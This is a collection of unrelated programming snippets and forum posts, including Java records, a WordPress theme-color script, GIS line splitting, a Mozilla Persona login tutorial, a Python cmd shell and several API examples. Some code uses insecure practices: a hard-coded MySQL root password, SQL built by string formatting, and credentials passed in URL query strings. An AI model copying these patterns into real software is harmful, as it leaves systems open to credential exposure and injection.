// instanceof pattern matching is used here; this feature is also new in JDK 14.
if (oos.readObject() instanceof User user1) {
user = user1;
}
/*
The statement above could also be written as:
user= (User) oos.readObject();
*/
} catch (IOException | ClassNotFoundException e) {
e.printStackTrace();
}
return user;
}
import java.io.*;
import java.nio.file.Files;
import java.nio.file.Paths;
record User(String name, int age) implements Serializable {
}
public class Main {
static void write(User user, String filePath) {
try (var oos = new ObjectOutputStream(Files.newOutputStream(Paths.get(filePath)))) {
oos.writeObject(user);
} catch (IOException e) {
e.printStackTrace();
}
}
static User read(String filePath) {
User user = null;
try (var oos = new ObjectInputStream(Files.newInputStream(Paths.get(filePath)))) {
// instanceof pattern matching is used here; this feature is also new in JDK 14.
if (oos.readObject() instanceof User user1) {
user = user1;
}
/*
The statement above could also be written as:
user= (User) oos.readObject();
*/
} catch (IOException | ClassNotFoundException e) {
e.printStackTrace();
}
return user;
}
public static void main(String[] args) {
var user = new User("测试用户", 20);
var filePath = "Java14Record";
write(user, filePath);
var readUser = read(filePath);
System.out.println(readUser.toString());
}
}
In the currently released version, record, like var, is a restricted identifier rather than a keyword, so record can still be used like this:
var record=100;
void record(){}
But it cannot be used as a class name; the following code produces a compile error ('record' is a restricted identifier and cannot be used for type declarations):
class record{}
IDEA provides a decompile feature, found here:
The class after compilation:
// IntelliJ API Decompiler stub source generated from a class file
// Implementation of methods is not available
package cn.bckf.java14demo;
final class User extends java.lang.Record implements java.io.Serializable {
private final java.lang.String name;
private final int age;
public User(java.lang.String name, int age) { /* compiled code */ }
public java.lang.String toString() { /* compiled code */ }
public final int hashCode() { /* compiled code */ }
public final boolean equals(java.lang.Object o) { /* compiled code */ }
public java.lang.String name() { /* compiled code */ }
public int age() { /* compiled code */ }
}
You will find that after compilation, toString(), hashCode(), equals(), and accessor methods for the fields (without a get prefix) are generated automatically, and the fields are marked private final.
All right, you can now happily start using Records. ☺
I've recently been using the Twenty Fifteen theme and tried out its color options; they work quite well. That gave me an idea: have the colors switch automatically to a light scheme during the day and a dark scheme at night.
After some research I found that the color configuration is stored in the wp_options table, in the row whose option_name column is 'theme_mods_twentyfifteen'.
That makes things much easier.
If you use Autoptimize or another caching plugin, the shell script that updates the colors must first update the color and then clear the cache once.
Python version: Python 3.6+ is required.
First, install the Python MySQL connector package:
pip install mysql-connector-python
Some systems may need:
pip3 install mysql-connector-python
import mysql.connector
from mysql.connector import errorcode
import sys
'''
Periodically update the color configuration of the WordPress Twenty Fifteen theme.
Install: pip install mysql-connector-python
Usage: python3 BckfCNUpdateTheme.py blueStyle
Usage: python3 BckfCNUpdateTheme.py darkStyle
Usage: python3 BckfCNUpdateTheme.py yellowStyle
Usage: python3 BckfCNUpdateTheme.py pinkStyle
Usage: python3 BckfCNUpdateTheme.py purpleStyle
'''
# yellow color scheme
yellowStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"f4ca16";s:12:"color_scheme";s:6:"yellow";s:17:"sidebar_textcolor";s:7:"#111111";s:23:"header_background_color";s:7:"#ffdf00";s:12:"header_image";s:13:"remove-header";}'
# pink color scheme
pinkStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"ffe5d1";s:12:"color_scheme";s:4:"pink";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#e53b51";s:12:"header_image";s:13:"remove-header";}'
# purple color scheme
purpleStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"674970";s:12:"color_scheme";s:6:"purple";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#2e2256";s:12:"header_image";s:13:"remove-header";}'
# blue color scheme
blueStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"e9f2f9";s:12:"color_scheme";s:4:"blue";s:17:"sidebar_textcolor";s:7:"#ffffff";s:23:"header_background_color";s:7:"#55c3dc";s:12:"header_image";s:13:"remove-header";}'
# dark color scheme
darkStyle='a:7:{i:0;b:0;s:18:"custom_css_post_id";i:2941;s:16:"background_color";s:6:"111111";s:12:"color_scheme";s:4:"dark";s:17:"sidebar_textcolor";s:7:"#bebebe";s:23:"header_background_color";s:7:"#202020";s:12:"header_image";s:13:"remove-header";}'
def updateStyle(style):
try:
cnx = mysql.connector.connect(user='root',
database='wordpress',host='127.0.0.1',password='123')
cursor = cnx.cursor()
result=cursor.execute("""update wp_options set option_value='{0}' where option_name='theme_mods_twentyfifteen' """.format(style))
print(result)
cnx.commit()
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
cursor.close()
cnx.close()
print("处理完成!~")
if __name__ == '__main__':
if len(sys.argv)>1:
styleStr=sys.argv[1]
if styleStr=='blueStyle':
updateStyle(blueStyle)
elif styleStr=='darkStyle':
updateStyle(darkStyle)
elif styleStr=='yellowStyle':
updateStyle(yellowStyle)
elif styleStr=='pinkStyle':
updateStyle(pinkStyle)
elif styleStr=='purpleStyle':
updateStyle(purpleStyle)
Shell script (put the following line in a shell script and save the file):
python3 BckfCNUpdateTheme.py blueStyle
Cron jobs (the first runs every day at 20:00, the second every day at 08:00):
0 20 * * * sh /opt/style01.sh
0 8 * * * sh /opt/style02.sh
If you are not using a caching plugin, you can also put the command that calls the Python program directly in the cron job.
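A hedged variation (the threshold hours are my own assumption): the script itself could pick the style from the local time, so a single cron entry without arguments would be enough. updateStyle, darkStyle and blueStyle are the functions and constants defined in the script above.
from datetime import datetime

hour = datetime.now().hour
# dark scheme in the evening and at night, light blue scheme during the day
updateStyle(darkStyle if (hour >= 20 or hour < 8) else blueStyle)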
|
You can use Python with shapely , with PyQGIS or directly with OpenJump GIS or PostGIS as mnt.biker says.
With Python:
1) the first solution is to find the intersections of the lines and then break the input coords into parts (look at cut.py or Get the vertices on a LineString either side of a Point with shapely) -> not very easy...
2) a more direct solution is to use the union operations (combine with PyQGIS): the method will split all self-intersecting geometries ([geos-devel] split self-intersecting LineString into non-intersecting lines)
Example with shapely and Fiona (similar with PyQGIS)
import fiona
from shapely.geometry import shape, MultiLineString
from shapely.ops import unary_union
# open the line shapefile and transform to a shapely geometry
file = fiona.open('line.shp')
line = shape(file.next()['geometry'])
# open the contours shapefile and transform to a MultiLineString shapely geometry
Multi = MultiLineString([shape(lin['geometry']) for lin in fiona.open('contours.shp')])
# now you can use the `union`, `cascaded_union` or `unary_union` of shapely
result = unary_union([line, Multi])
and save the resulting shapefile with Fiona.
If you want to save only the line that needs to be cut, look at Code for splitting a line with another line
And you can use a spatial index with the module Rtree to speed things up.
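To make solution 2) concrete, here is a hedged sketch (file names, CRS handling and the output schema are assumptions) that unions the two layers and writes every resulting non-intersecting segment back out with Fiona:
import fiona
from shapely.geometry import shape, mapping, MultiLineString
from shapely.ops import unary_union

with fiona.open('line.shp') as src:
    line = shape(next(iter(src))['geometry'])
    crs = src.crs

contours = MultiLineString([shape(f['geometry']) for f in fiona.open('contours.shp')])
merged = unary_union([line, contours])                  # noded at every intersection
pieces = merged.geoms if hasattr(merged, 'geoms') else [merged]

schema = {'geometry': 'LineString', 'properties': {}}
with fiona.open('split_lines.shp', 'w', driver='ESRI Shapefile', schema=schema, crs=crs) as dst:
    for segment in pieces:                              # each non-intersecting piece
        dst.write({'geometry': mapping(segment), 'properties': {}})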
3) but the most comprehensive solution is to compute the Topological Planar Graph of the combined layers.
it can be drawn on the plane in such a way that its edges intersect only at their endpoints. In other words, it can be drawn in such a way that no edges cross each other
I have a Python class to do it but I will use here OpenJump:
With OpenJump GIS and the Planar Graph command
1) you load the shapefiles and compute the union (combined layer):
2) you compute the Planar Graph
3) and you have the nodes, the faces and the arcs (edges) of the graph as the result, all with the corresponding attribute values preserved.
With PostGIS (version 2.00 and up) (mnt.biker answer)
The results are the same
New
In OpenJUMP use Combine Layers("Rassemblez les couches" in French) and not Union
|
I've been coding again and just remembered how well this website works for keeping track of cool tricks I learn. Sometimes it's really hard to find simple and generic examples of things to help teach the fundamentals. I needed to write to a file without opening the text document 1000 times and I finally found a really clean example that helped me understand the pieces.
Edit** Threadpool is a lot easier and you can thread inside a loop:
from multiprocessing.pool import ThreadPool as Pool
threads = 100
p = Pool(threads)
p.map(function, list)
More complicated version:
import threading
lock = threading.Lock()
def thread_test(num):
phrase = "I am number " + str(num)
with lock:
print phrase
f.write(phrase + "\n")
threads = []
f = open("text.txt", 'w')
for i in range (100):
t = threading.Thread(target = thread_test, args = (i,))
threads.append(t)
t.start()
while threading.activeCount() > 1:
pass
else:
f.close()
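A hedged alternative to the busy-wait loop above: joining each thread blocks until it finishes, so the file can be closed as soon as all workers are done (this reuses the threads list and the file object f from the example).
for t in threads:
    t.join()      # wait for every worker to finish
f.close()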
Close something on Scrapy spider close without using a pipeline:
from scrapy import signals
from scrapy.spiders import CrawlSpider
from scrapy.xlib.pydispatch import dispatcher

class MySpider(CrawlSpider):
    def __init__(self, *args, **kwargs):
        super(MySpider, self).__init__(*args, **kwargs)
        dispatcher.connect(self.spider_closed, signals.spider_closed)

    def spider_closed(self, spider):
        # second param is the instance of the spider about to be closed.
        pass
Instead of using an if time or if count to activate something, I found a decorator that will make sure the function only runs once:
def run_once(f):
def wrapper(*args, **kwargs):
if not wrapper.has_run:
wrapper.has_run = True
return f(*args, **kwargs)
wrapper.has_run = False
return wrapper
@run_once
def my_function(foo, bar):
return foo+bar
You can also resize the terminal inside the code:
import sys
sys.stdout.write("\x1b[8;{rows};{cols}t".format(rows=46, cols=54))
I got stuck for a while trying to get my repository to let me login without creating an ssh key (super annoying imo) and I figured out that I added the ssh url for the origin url and needed to reset it to the http:
change origin url
git remote set-url origin <url-with-your-username>
Combine mp3 files with linux:
ls *.mp3
sudo apt-get install mp3wrap
mp3wrap output.mp3 *.mp3
Regex is always better than splitting a bunch of times and making the code messy. Plus it's a lot easier to pick up the code later on and figure out what's going on. So I decided to take my regex to the next level and start labeling groups (I'm even going to give it its very own tag :3):
pat = r'(?<=\,\"searchResults\"\:\{)(?P<list_results>.*)(?=\,\"resultsHash\"\:)'
m = re.search(pat, url)  # re.search, since the lookbehind can't match at the very start; Python named groups use (?P<name>...)
if m:
    self.domain = m.group('list_results')
|
Backup also tries to run - and fails - on the secondary DNS server, even though the web service is not enabled there.
short description
What is happening and what is wrong with that?
I have a multi-server environment with 2 servers (one of them is the master) and a secondary DNS server that has only the DB and DNS services installed and enabled. The secondary DNS server mirrors the "master" webserver where the primary DNS service runs. Since the 3.2 update, the backup of the websites reports errors on the secondary DNS server as well, despite the fact that these websites do not reside on it but only on the master webserver. The errors state that the backup could not be run for the sites (since the path is valid only on the master web server, not on the secondary DNS server).
The backup on the server, holding the site takes place properly.
correct behaviour
What should happen instead?
The backup shall only run on the webserver where the sites do reside and not on any mirrored server, especially if the service is not enabled on it at all.
environment
Server OS: Debian 9
Server OS version: stretch
ISPConfig version: 3.2 (you can use grep 'ISPC_APP_VERSION' /usr/local/ispconfig/server/lib/config.inc.php to get it from the command line)
If it might be related to the problem
root@castor:~# apachectl -v
Server version: Apache/2.4.25 (Debian)
Server built: 2019-10-13T15:43:54
root@castor:~# php -v
PHP 7.0.33-34+0~20201018.42+debian9~1.gbp80c9be (cli) (built: Oct 18 2020 21:35:49) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
with Zend OPcache v7.0.33-34+0~20201018.42+debian9~1.gbp80c9be, Copyright (c) 1999-2017, by Zend Technologies
with Xdebug v2.8.1, Copyright (c) 2002-2019, by Derick Rethans
|
Adding the Mozilla Persona sign-in system to your website only takes five steps:
Include the Mozilla Persona JavaScript library in your pages.
Add "sign in" and "sign out" buttons.
Watch for sign-in and sign-out actions.
Verify users' credentials.
Review the best practices.
You should be able to get it up and running in a single afternoon, but first things first: if you're going to use Mozilla Persona on your site, please take a few minutes to subscribe to the Mozilla Persona mailing list. It has very little traffic, since it is only used to announce changes or security issues that may negatively impact your site.
Persona is designed to be browser-independent and works correctly on all modern desktop and mobile browsers. This is possible thanks to Persona's cross-platform JavaScript library. Once this library is loaded in your page, the Persona functions you need (watch(), request(), and logout()) are available on the global navigator.id object.
To include the Persona JavaScript library, you can put this script tag in the head of your page:
<script src="https://login.persona.org/include.js"></script>
You must include this in every page that uses the navigator.id functions. Because Persona is still in development, you should not host the include.js file on your own server.
Because Persona is designed as a DOM API, you must call functions when a user clicks the sign-in and sign-out buttons on your site. To open the Persona dialog and ask the user to sign in, call navigator.id.request(). To sign out, call navigator.id.logout().
For example:
var signinLink = document.getElementById('signin');
if (signinLink) {
signinLink.onclick = function() { navigator.id.request(); };
};
var signoutLink = document.getElementById('signout');
if (signoutLink) {
signoutLink.onclick = function() { navigator.id.logout(); };
};
What should those buttons look like? Take a look at our branding resources page for images and pre-made CSS buttons.
For Persona to work, you need to tell it what to do when a user signs in or out. This is done by calling the navigator.id.watch() function and passing it three parameters:
The loggedInEmail of the user currently signed in to your site, or null if there is none. You should generate this dynamically when the page is rendered.
A function to invoke when an onlogin action is triggered. This function is passed a single parameter, an "identity assertion", which must be verified.
A function to invoke when an onlogout action is triggered. No parameters are passed to this function.
Note: You must always include both functions, onlogin and onlogout, when you call navigator.id.watch().
For example, if you currently believe that Bob is signed in to your site, you can do this:
var currentUser = 'bob@example.com';
navigator.id.watch({
loggedInEmail: currentUser,
onlogin: function(assertion) {
// A user has signed in! Here you need to:
// 1. Send the assertion to your server to verify it and create a session.
// 2. Update the user interface.
$.ajax({ /* <-- This example uses jQuery, but use whatever you like */
type: 'POST',
url: '/auth/login', // This is a URL on your server.
data: {assertion: assertion},
success: function(res, status, xhr) { window.location.reload(); },
error: function(res, status, xhr) { alert("login failure" + res); }
});
},
onlogout: function() {
// A user has signed out. Here you need to:
// tear down the session, by redirecting the user or making a call to your server.
$.ajax({
type: 'POST',
url: '/auth/logout', // This is a URL on your server.
success: function(res, status, xhr) { window.location.reload(); },
error: function(res, status, xhr) { alert("logout failure" + res); }
});
}
});
In this example, both onlogin and onlogout are implemented by making an asynchronous POST request to the site's server. The server logs the user in or out, usually by setting or deleting information in the session cookie. Then, if everything checks out, the page reloads to pick up the new session state.
You can use AJAX to implement this without reloading or redirecting the page, but that is beyond the scope of this tutorial.
You must call this function on every page that has a sign-in or sign-out button. To support upcoming Persona improvements, such as automatic sign-in and global sign-out, you should call it on every page of your site.
Instead of passwords, Persona uses "identity assertions", which are something like single-use, single-site passwords combined with the user's email address. When a user wants to sign in, your onlogin callback will be invoked with an assertion from that user. Before you sign them in, you must verify that the assertion is valid.
It is extremely important that you verify the assertion on your server, and not in the JavaScript code running in the user's browser, since that would be easy to forge. The example above sent the assertion to the site's server using jQuery's $.ajax() function to POST it to /api/login.
Once your server has the assertion, how do you verify it? The easiest way is to use a helper service provided by Mozilla. Simply send a POST request to https://verifier.login.persona.org/verify with two parameters:
assertion: The identity assertion provided by the user.
audience: The hostname and port of your site. You must hard-code this value in your server code; do not derive it from any user-supplied data.
For example, if you are example.com, you can use the command line to test an assertion with:
$ curl -d "assertion=<ASSERTION>&audience=https://example.com:443" "https://verifier.login.persona.org/verify"
If it is valid, you'll get a JSON response like the following:
{
"status": "okay",
"email": "bob@eyedee.me",
"audience": "https://example.com:443",
"expires": 1308859352261,
"issuer": "eyedee.me"
}
You can learn more about the verification service by reading The Verification Service API. An example implementation of /api/login, using Python, the Flask web framework, and the Requests HTTP library, would look like this:
@app.route('/api/login', methods=['POST'])
def login():
# The request has to have an assertion for us to verify
if 'assertion' not in request.form:
abort(400)
# Send the assertion to Mozilla's verifier service.
data = {'assertion': request.form['assertion'], 'audience': 'https://example.com:443'}
resp = requests.post('https://verifier.login.persona.org/verify', data=data)
# Did the verifier respond?
if resp.ok:
# Parse the response
verification_data = json.loads(resp.content)
# Check if the assertion was valid
if verification_data['status'] == 'okay':
# Log the user in by setting a secure session cookie
session.update({'email': verification_data['email']})
return resp.content
# Oops, something failed. Abort.
abort(500)
Session management is probably very similar to your existing login system. The first big change is verifying the user's identity by checking an assertion instead of checking a password. The other big change is making sure the user's email address is available to use as the loggedInEmail parameter for navigator.id.watch().
Logout is simple: you just need to remove the user's session cookie.
Once everything works and you've successfully signed in and out of your site, you should take a moment to review the best practices for using Persona securely.
If you're building a production-ready site, you may want integration tests that simulate a user signing in and out of your site using BrowserID. To make this easier in Selenium, consider the bidpom library. The sites mockmyid.com and personatestuser.org are also useful.
Finally, don't forget to sign up for the Persona news mailing list so you are notified of any security issues or backwards-incompatible changes to the Persona API. The list is extremely low traffic: it is only used to announce changes that may impact your site.
|
0x00 About the cmd module
A command-line interpreter created with the cmd module can read all input lines in a loop and parse them.
0x01 Some commonly used methods of the cmd module (a minimal sketch follows the list):
cmdloop(): similar to Tkinter's mainloop; runs the Cmd interpreter
onecmd(str): reads the input and processes it; you usually don't need to override this function, but instead use a more specific do_command to handle a particular command
emptyline(): called when an empty line is entered
default(line): called when the entered command cannot be recognized
completedefault(text, line, begidx, endidx): called when there is no matching complete_*() method
precmd(line): called just before the command line is interpreted
postcmd(stop, line): called just after the command line is interpreted
preloop(): called before cmdloop() runs
postloop(): called after cmdloop() exits
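Before the full example below, a minimal hedged sketch (the command names are made up) of how a few of the hooks listed above fit together:
from cmd import Cmd

class MiniShell(Cmd):
    prompt = "mini> "

    def do_greet(self, arg):            # invoked for the "greet" command
        print("hello, %s" % (arg or "world"))

    def emptyline(self):                # called when the user enters a blank line
        pass                            # the default would repeat the last command

    def default(self, line):            # called for unrecognized commands
        print("unknown command: %s" % line)

    def do_exit(self, arg):             # returning True stops cmdloop()
        return True

if __name__ == "__main__":
    MiniShell().cmdloop()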
0x02 A simple implementation of shell commands with the cmd module
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys
import os
import socket
from cmd import Cmd
class ClassShell(Cmd):
"""docstring for ClassShell"""
def __init__(self):
Cmd.__init__(self)
os.chdir("C:/Users/WYB_9/Desktop")
hostName = socket.gethostname()
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
def help_dir(self):
print "dir [path]"
def do_dir(self, arg):
if not arg:
print "\n".join(os.listdir('.'))
elif os.path.exists(arg):
print "\n".join(os.listdir(arg))
else:
print "no such path exists"
def help_ls(self):
print "ls [path]"
def do_ls(self, arg):
if not arg:
print "\n".join(os.listdir('.'))
elif os.path.exists(arg):
print "\n".join(os.listdir(arg))
else:
print "no such path exists"
def help_pwd(self):
print "pwd"
def do_pwd(self, arg):
print os.path.abspath('.')
def help_cd(self):
print "cd [path]"
def do_cd(self, arg):
hostName = socket.gethostname()
if not arg:
os.chdir("C:/Users/WYB_9/Desktop")
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
elif os.path.exists(arg):
os.chdir(arg)
self.prompt = "reber@" + hostName + " " + os.path.abspath('.') + "\n$ "
else:
print "no such path"
def help_clear(self):
print "clear"
def do_clear(self, arg):
i = os.system('cls')
def help_cat(self):
print "cat filename"
def do_cat(self, arg):
if os.path.exists(arg):
with open(arg,"r") as f:
data = f.read()
print data
else:
print "no such file exists"
def help_mv(self):
print "mv oldfilename newfilename"
def do_mv(self, arg):
oldfilename,newfilename = arg.split()
if os.path.exists(oldfilename):
os.rename(oldfilename,newfilename)
else:
print "no such file:" + oldfilename
def help_touch(self):
print "touch filename"
def do_touch(self, arg):
with open(arg, "w") as f:
pass
def help_rm(self):
print "rm filepath"
def do_rm(self, arg):
if os.path.exists(arg):
os.remove(arg)
else:
print "no such file:" + arg
def help_cp(self):
print "cp oldfilepath newfilepath"
def do_cp(self, arg):
oldfilepath,newfilepath = arg.split()
if os.path.exists(oldfilepath):
with open(oldfilepath, "r") as f:
data = f.read()
with open(newfilepath, "w") as f:
f.write(data)
else:
print "no such path:" + oldfilepath
def help_exit(self):
print "input exit will exit the program"
def do_exit(self, arg):
print "Exit:",arg
sys.exit()
if __name__ == '__main__':
shell = ClassShell()
shell.cmdloop()
|
Ro
Recently I had a great idea that would allow Pythonista users to be able to use colorama (or other color markup) in their programs rather than using console functions!
How it would work
The program would run in the background as a thread and would intercept new stdout messages! Rather than being printed, the program would parse the message and check for color tags (eg. \033[44m)! If the program detects a color tag it could then change the color of the corresponding text at the segment of the tag
[1]!
With this: more PC python programs that can run on pythonista and use in-line color tags!!!
# [1] Example
...
if r"\033" in message: # check for \033 colors
color = parse_colors(message) # needed function
sys.stdout.write(text_before_colorized)
if color == "[44": # parsing
console.set_color(0,0,1)
sys.stdout.write(text_after_colorized)
sys.stdout.write("\n") # ending print
...
# There are many flaws with this example code but it shows the basic idea of how some of it would work!
# ToDo: Parse multiple color codes in string
# ToDo: Ignore r"messages"
# ToDo: Ignore non-strings
# ToDo: Make thread immune to KeyboardInturrupt
# ToDo: Add kill method to thread
# ToDo: Support multiple color markups
# Error: >>> print "message",
# would not remove the "\n" are parsing
# End Result:
# >>> print "normal color \033[44m blue color"
# normal color blue color
# ^ ^ this would be blue
I wanted to share this idea with the community because I can't find time to make it and rather than just let the good idea die: I would like to share it with people who may be interested in using it!
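As a rough, hedged illustration of the interception idea above, here is a sketch of a file-like stdout wrapper that detects ANSI color tags with a regular expression; mapping each tag to console.set_color is left as a stub, since this hasn't been tested on-device:
import re
import sys

ANSI = re.compile(r'\x1b\[([0-9;]*)m')

class ColorStdout(object):
    def __init__(self, target):
        self.target = target
    def write(self, text):
        pos = 0
        for m in ANSI.finditer(text):
            self.target.write(text[pos:m.start()])   # text before the color tag
            # a real implementation would map m.group(1) to console.set_color here
            pos = m.end()
        self.target.write(text[pos:])                # remaining text after the last tag
    def flush(self):
        self.target.flush()

sys.stdout = ColorStdout(sys.__stdout__)
print("normal color \x1b[44m blue-tagged text")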
Ro
A deadly error has occurred while I was using the latest version of Pythonista 3 on an iPhone 6 using iOS 11.2.2! After creating a md file called "127.0.0.2.md" with "os.mkfifo" and opening the file, I was unable to edit anything in the file; then everything froze and the app crashed. But now, every time I open the app, Pythonista 3 shows the logo and crashes. I've tried holding power & home to do a reset which didn't work; I've tried doing a shutdown which did let me do some things, but if I try to look at other files or change the file name, it will crash; and I have tried using the shortcut "pythonista3://" but that also results in a crash.
This deeply worries me because I was working on a huge project and now the app is not going to function.
Update: This affects more than just Pythonista; it also kills your keyboard and you can't get your keyboard to pop up in certain apps.
Here is the error log from my device: https://ghostbin.com/paste/oyf27
Update: Pythonista 3 has a safe mode which fixed everything! THANK F*CKING GOD THAT'S A FEATURE! I would have cried if that didn't exist
Ro
I found a working DLNA Controller & Server that can run on Pythonista: https://github.com/cherezov/dlnap/blob/master/dlnap/dlnap.py
|
.upper(), .lower(), and .title() all are performed on an existing string and produce a string in return. Let’s take a look at a string method that returns a different object entirely!
.split() is performed on a string, takes one argument, and returns a list of substrings found between the given argument (which in the case of .split() is known as the delimiter). The following syntax should be used:
string_name.split(delimiter)
If you do not provide an argument for .split() it will default to splitting at spaces.
For example, consider the following strings:
man_its_a_hot_one = "Like seven inches from the midday sun"
print(man_its_a_hot_one.split())
# => ['Like', 'seven', 'inches', 'from', 'the', 'midday', 'sun']
.split() returned a list with each word in the string. Important to note: if we run .split() on a string with no spaces, we will get a list containing the whole string as its only element.
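For instance, here is what splitting on an explicit delimiter and splitting a string with no spaces look like (the strings are chosen just for illustration):
delimiter_example = "beach day"
print(delimiter_example.split("a"))
# => ['be', 'ch d', 'y']

no_spaces = "nowhitespace"
print(no_spaces.split())
# => ['nowhitespace']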
Instructions
1.
In the code editor is a string of the first line of the poem Spring Storm by William Carlos Williams.
Use .split() to create a list called line_one_words that contains each word in this line of poetry.
|
Retrieves all metadata for the specified file.
12345
The unique identifier that represents a file.
To find the file ID, visit the file in the web application and copy the ID from the URL. For example, if the URL is https://*.app.box.com/files/123, the file_id is 123.
curl -i -X GET "https://api.box.com/2.0/files/12345/metadata" \
-H "Authorization: Bearer <ACCESS_TOKEN>"
BoxMetadataTemplateCollection<Dictionary<string, object>> metadataInstances = await client.MetadataManager
.GetAllFileMetadataTemplatesAsync(fileId: "11111");
BoxFile file = new BoxFile(api, "id");
Iterable<Metadata> metadataList = file.getAllMetadata();
for (Metadata metadata : metadataList) {
// Do something with the metadata.
}
file_metadata = client.file(file_id='11111').get_all_metadata()
for instance in file_metadata:
if 'foo' in instance:
print('Metadata instance {0} has value "{1}" for foo'.format(instance['id'], instance['foo']))
client.files.getAllMetadata('11111')
.then(metadata => {
/* metadata -> {
entries:
[ { currentDocumentStage: 'Init',
'$type': 'documentFlow-452b4c9d-c3ad-4ac7-b1ad-9d5192f2fc5f',
'$parent': 'file_11111',
'$id': '50ba0dba-0f89-4395-b867-3e057c1f6ed9',
'$version': 4,
'$typeVersion': 2,
needsApprovalFrom: 'Smith',
'$template': 'documentFlow',
'$scope': 'enterprise_12345' },
{ '$type': 'productInfo-9d7b6993-b09e-4e52-b197-e42f0ea995b9',
'$parent': 'file_11111',
'$id': '15d1014a-06c2-47ad-9916-014eab456194',
'$version': 2,
'$typeVersion': 1,
skuNumber: 45334223,
description: 'Watch',
'$template': 'productInfo',
'$scope': 'enterprise_12345' },
{ Popularity: '25',
'$type': 'properties',
'$parent': 'file_11111',
'$id': 'b6f36cbc-fc7a-4eda-8889-130f350cc057',
'$version': 0,
'$typeVersion': 2,
'$template': 'properties',
'$scope': 'global' } ],
limit: 100 }
*/
});
client.metadata.list(forFileId: "11111") { (result: Result<[MetadataObject], BoxSDKError>) in
guard case let .success(metadata) = result else {
print("Error retrieving metadata")
return
}
print("Retrieved \(metadata.count) metadata instances:")
for instance in metadata {
print("- \(instance.template)")
}
}
{
"entries": [
{
"$parent": "folder_59449484661,",
"$template": "marketingCollateral",
"$scope": "enterprise_27335",
"$version": 1
}
],
"limit": 100
}
|
Send bulk email messages from a template with Python
import urllib2
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/http/?class="+afilnet_class+"&method="+afilnet_method+"&user="+afilnet_user+"&password="+afilnet_password+"&idgroup="+afilnet_idgroup+"&idtemplate="+afilnet_idtemplate+"&scheduledatetime="+afilnet_scheduledatetime+"&output="+afilnet_output
result = urllib2.urlopen(sUrl).read()
from urllib.request import urlopen
from urllib.parse import urlencode
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/http/"
data = urlencode({"class": afilnet_class,"method": afilnet_method,"user": afilnet_user,"password": afilnet_password,"idgroup": afilnet_idgroup,"idtemplate": afilnet_idtemplate,"scheduledatetime": afilnet_scheduledatetime,"output": afilnet_output}).encode("utf-8")
result = urlopen(sUrl, data).read()
print(result)
import requests
afilnet_class="email"
afilnet_method="sendemailtogroupfromtemplate"
afilnet_user="user"
afilnet_password="password"
afilnet_idgroup="1000"
afilnet_idtemplate="1000"
afilnet_scheduledatetime=""
afilnet_output=""
# Create an URL request
sUrl = "https://www.afilnet.com/api/basic/?class="+afilnet_class+"&method="+afilnet_method+"&idgroup="+afilnet_idgroup+"&idtemplate="+afilnet_idtemplate+"&scheduledatetime="+afilnet_scheduledatetime+"&output="+afilnet_output
result = requests.get(sUrl,auth=requests.auth.HTTPBasicAuth(afilnet_user,afilnet_password))
print(result.text)
Parameter | Description | Required / Optional
class=email | Requested class: the class to which the request is made | Required
method=sendemailtogroupfromtemplate | Requested class method: the method of the class to which the request is made | Required
user | The user / email address of your Afilnet account | Required
password | The password of your Afilnet account | Required
idgroup | Identifier of the target group | Required
idtemplate | Identifier of the template to send | Required
scheduledatetime | Delivery date and time in yyyy-mm-dd hh:mm:ss format | Optional
output | Output format of the result | Optional
When a request is made, the following fields are returned:
status
result (if status = success), with the following values:
id
count
credits
destinations
messageid
destination
error (if status = error), containing the error code
The possible error codes are listed below
Code Description
MISSING_USER User or email not included
MISSING_PASSWORD Password not set
MISSING_CLASS Class not set
MISSING_METHOD Method not set
MISSING_COMPULSORY_PARAM A compulsory parameter is missing
INCORRECT_USER_PASSWORD Incorrect user or password
INCORRECT_CLASS Incorrect class
INCORRECT_METHOD Incorrect method
NOT_ACCESS_TO_GROUP You do not have access to the specified group
NO_CREDITS Your balance is insufficient
Parameters:
class: email
method: sendemailtogroupfromtemplate
user: user
password: password
idgroup: 1000
idtemplate: 1000
scheduledatetime:
output:
Request:
https://www.afilnet.com/api/http/?class=email&method=sendemailtogroupfromtemplate&user=user&password=password&idgroup=1000&idtemplate=1000&scheduledatetime=&output=
|
Demo: bilibili
Using: Python 3.5, ffmpeg binaries
Dependencies: PIL, string, numpy, math
Note that this is only a prototype; performance is, frankly, nonexistent.
First, extract frames from the video. On the command line:
ffmpeg -ss TIME -t DURING -i INPUT -frames:v TOTAL OUTPUT
TIME: the time to start extracting from
DURING: the duration to extract
INPUT: the video file name
TOTAL: the number of frames to extract
OUTPUT: the output image name (e.g. pic%d.png will produce pic1.png, pic2.png, …)
Then the Python part:
from PIL import Image, ImageDraw, ImageFont
import string
import numpy
import math

FontSize = 24
font = ImageFont.truetype('consola.ttf', FontSize)
FontPxSize = font.getsize('A')
LetterLuma = {}
LetterUsed = "qwertyuiopasdfghjklzxcvbnm[];',.{}:\"<>?~!@#$%^&*()_+-=123456789/"  # allowed characters
for letter in LetterUsed:
    imgl = Image.new('RGB', FontPxSize, (255, 255, 255))
    drawl = ImageDraw.Draw(imgl)
